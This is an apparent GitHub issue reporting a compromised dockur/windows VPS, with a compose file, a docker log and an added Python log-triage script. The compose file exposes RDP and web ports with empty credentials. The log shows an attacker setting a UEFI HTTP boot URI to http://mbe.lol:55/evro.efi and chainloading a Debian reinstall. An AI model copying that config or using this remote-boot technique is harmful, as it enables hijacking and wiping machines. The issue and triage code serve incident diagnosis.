
OS Changes and Hack Threats #1676

@ErisaiKalimon

Operating system

Windows 11

Description

Hello everyone and the developer team. I would like to ask about signs of hacking and the OS suddenly changing. I installed docker/windows on a VPS that is connected to the internet and has a public IP, but after I left it for 2 days my OS had suddenly changed to Debian 13. When I checked with the command docker compose logs, I found a sudden install to the domain https://mbe.lol/ and others, as shown in the docker logs I attached.

And now my OS is changed and my data is lost.

Docker compose

services:
  windows:
    image: dockurr/windows
    container_name: windows
    environment:
      VERSION: "11"
      USERNAME: ""
      PASSWORD: ""
      RAM_SIZE: "14G"
      CPU_CORES: "5"
      DISK_SIZE: "250G"
    devices:
      - /dev/kvm
      - /dev/net/tun
    cap_add:
      - NET_ADMIN
    ports:
      - 8006:8006
      - 3389:3389/tcp
      - 3389:3389/udp
    volumes:
      - ./windows:/storage
    restart: always
    stop_grace_period: 2m

Docker log

h  ht  htt  http  http:  http:/  http://  http://m  http://mb  http://mbe  http://mbe.
http://mbe.l  http://mbe.lo  http://mbe.lol  http://mbe.lol:  http://mbe.lol:5  http://mbe.lol:55  http://mbe.lol:55/
http://mbe.lol:55/e  http://mbe.lol:55/ev  http://mbe.lol:55/evr  http://mbe.lol:55/evro  http://mbe.lol:55/evro.
http://mbe.lol:55/evro.e  http://mbe.lol:55/evro.ef  http://mbe.lol:55/evro.efi

HTTP Boot Configuration

Configuration changed
UEFI HTTP                     Input the description
<IP4>                         Internet Protocol
http://mbe.lol:55/evro.efi    Boot URI

F10=Save   F9=Reset to Defaults   Esc=Exit   ↑↓=Move Highlight   <Enter>=Select Entry
A new Boot Option will be created according to this Boot URI.

Esc=Exit   ↑↓=Move Highlight   <Enter>=Select Entry
Device Path : PciRoot(0x0)/Pci(0x3,0x0)/MAC(02D160EA3072,0x1)/IPv4(0.0.0.0,0x0,DHCP,0.0.0.0,0.0.0.0,0.0.0.0)/Uri(http://mbe.lol:55/evro.efi)
windows  | >>Start HTTP Boot over IPv4....
windows  |   Station IP address is 172.30.0.2
windows  |
windows  |   URI: http://mbe.lol:55/evro.efi
windows  |   File Size: 1137664 Bytes
  Downloading...100%
iPXE initialising devices...
windows  | autoexec.ipxe... Not found (https://ipxe.org/2d0c618e)
windows  |
windows  |
windows  |
windows  | iPXE 1.21.1+ (g0abef) -- Open Source Network Boot Firmware -- https://ipxe.org
windows  | Features: DNS HTTP HTTPS iSCSI NFS TFTP VLAN SRP AoE EFI Menu
windows  | netboot.xyz - v3.x
windows  | Configuring (net0 02:d1:60:ea:30:72)...... ok
windows  | Attempting https boot over IPv4...
windows  | https://boot.netboot.xyz/menu.ipxe... ok
windows  | boot.cfg... ok
windows  | Attempting to retrieve latest upstream version number...
windows  | https://boot.netboot.xyz/version.ipxe... ok
windows  |
windows  | netboot.xyz v3.x - next-server: 172.30.0.1
    Default:
        Boot from local hdd (293)
    Distributions:
        Linux Network Installs (64-bit)
        Live CDs
        BSD Installs
        Windows
    Tools:
        Utilities (UEFI)
        Architecture: x86_64
        iPXE shell
        Network card info
        About netboot.xyz
    Signature Checks:
        netboot.xyz [ enabled: true ]
    Boot from local hdd (293)   Boot from local hdd (292)   Boot from local hdd (292)   Boot from local hdd   Linux Network Installs (64-bit)
windows  |
windows  | linux.ipxe... ok
windows  | http://boot.netboot.xyz/sigs/linux.ipxe.sig... ok
windows  | Linux Installers - Current Arch [ x86_64 ]   ...
    Linux Distros:
        AlmaLinux
        Alpine Linux
        Arch Linux
        BlackArch
        CentOS Stream
        Debian
        Devuan
        Fedora
        Fedora CoreOS
        Flatcar Container Linux
        Gentoo
        Harvester
        IPFire
        k3OS
        Kairos
        Kali Linux
        Mageia
        NixOS
        openEuler
    AlmaLinux   AlmaLinux   Alpine Linux   Alpine Linux   Arch Linux   Arch Linux   BlackArch   BlackArch   CentOS Stream   CentOS Stream   Debian
windows  |
windows  | debian.ipxe... ok
windows  | http://boot.netboot.xyz/sigs/debian.ipxe.sig... ok
windows  | Debian - amd64
    Latest Releases
        Debian 13.0 (trixie)
        Debian 12.0 (bookworm)
    Testing Releases
        Debian forky (testing)
        Debian sid (unstable)
    Older Releases
        Set release codename...
    Debian 13.0 (trixie)
windows  | Debian [trixie] Installer
    Install types
        Text Based Install
        Graphical Based Install
        Rescue Mode
        Expert Install
        Specify preseed url...
    Text Based Install   Text Based Install   Graphical Based Install
windows  |
windows  | http://deb.debian.org/debian/dists/trixie/main/installer-amd64/current/images/netboot/gtk/debian-installer/amd64/linux... ok
windows  | http://deb.debian.org/debian/dists/trixie/main/installer-amd64/current/images/netboot/gtk/debian-installer/amd64/initrd.gz... ok
windows  |
windows  | MD5sums:
windows  | 422d12c9cae29654502dbbd411c7cc5c  linux
windows  | 74dcf240ff72ae1e4c2b615f2ebababc  initrd.gz
windows  | EFI stub: Loaded initrd from LINUX_EFI_INITRD_MEDIA_GUID device path
windows  | BdsDxe: loading Boot0009 "debian" from HD(1,GPT,94215454-F807-4E67-803A-EB0BA727181A,0x800,0x1E8000)/\EFI\debian\shimx64.efi
windows  | BdsDxe: starting Boot0009 "debian" from HD(1,GPT,94215454-F807-4E67-803A-EB0BA727181A,0x800,0x1E8000)/\EFI\debian\shimx64.efi

Screenshots (optional)

Image Image
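
Added example, not part of the original issue or of the dockur/windows project: a triage pass over `docker compose logs` output that extracts the boot-chain events visible in the log above (UEFI HTTP boot, boot URI, iPXE banner, remote fetches, firmware boot entry). The sample lines are copied from that log; the function names and the `Windows Boot Manager` allowlist entry are assumptions.

```python
import re
from urllib.parse import urlsplit

# Sample input: a subset of lines copied from the docker log in the issue above.
SAMPLE_LOG = r"""
windows  | >>Start HTTP Boot over IPv4....
windows  |   Station IP address is 172.30.0.2
windows  |   URI: http://mbe.lol:55/evro.efi
windows  | iPXE 1.21.1+ (g0abef) -- Open Source Network Boot Firmware -- https://ipxe.org
windows  | https://boot.netboot.xyz/menu.ipxe... ok
windows  | http://deb.debian.org/debian/dists/trixie/main/installer-amd64/current/images/netboot/gtk/debian-installer/amd64/linux... ok
windows  | BdsDxe: starting Boot0009 "debian" from HD(1,GPT,94215454-F807-4E67-803A-EB0BA727181A,0x800,0x1E8000)/\EFI\debian\shimx64.efi
""".strip()

PREFIX = re.compile(r"^\S+\s+\|\s?")                  # compose service prefix, e.g. "windows  | "
BOOT_URI = re.compile(r"^URI:\s+(\S+)")               # URI the firmware HTTP-booted from
FETCH_OK = re.compile(r"^(https?://\S+?)\.\.\. ok$")  # iPXE "<url>... ok" download lines
BDS_START = re.compile(r'BdsDxe: starting (Boot[0-9A-Fa-f]{4}) "([^"]*)"')


def triage(log_text, allowed_labels=frozenset({"Windows Boot Manager"})):
    """Return (line_no, kind, detail) for each boot-chain event in the log.

    allowed_labels holds the firmware boot-entry names expected for this
    guest (assumption: a Windows guest boots "Windows Boot Manager").
    """
    findings = []
    for no, raw in enumerate(log_text.splitlines(), 1):
        line = PREFIX.sub("", raw, count=1).strip()
        if "Start HTTP Boot over" in line:
            findings.append((no, "uefi-http-boot", line.lstrip(">")))
        elif m := BOOT_URI.search(line):
            findings.append((no, "boot-uri", urlsplit(m.group(1)).netloc))
        elif line.startswith("iPXE ") and "Network Boot Firmware" in line:
            findings.append((no, "ipxe-banner", line.split(" -- ")[0]))
        elif m := FETCH_OK.match(line):
            findings.append((no, "remote-fetch", urlsplit(m.group(1)).hostname))
        elif m := BDS_START.search(line):
            if m.group(2) not in allowed_labels:
                findings.append((no, "unexpected-boot-entry", m.group(2)))
    return findings


def network_reinstall_suspected(findings):
    """True when the guest was network-booted and then started a boot entry outside the allowlist."""
    kinds = {kind for _, kind, _ in findings}
    return "uefi-http-boot" in kinds and "unexpected-boot-entry" in kinds


if __name__ == "__main__":
    events = triage(SAMPLE_LOG)
    for no, kind, detail in events:
        print(f"line {no}: {kind}: {detail}")
    print("network reinstall suspected:", network_reinstall_suspected(events))
```
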
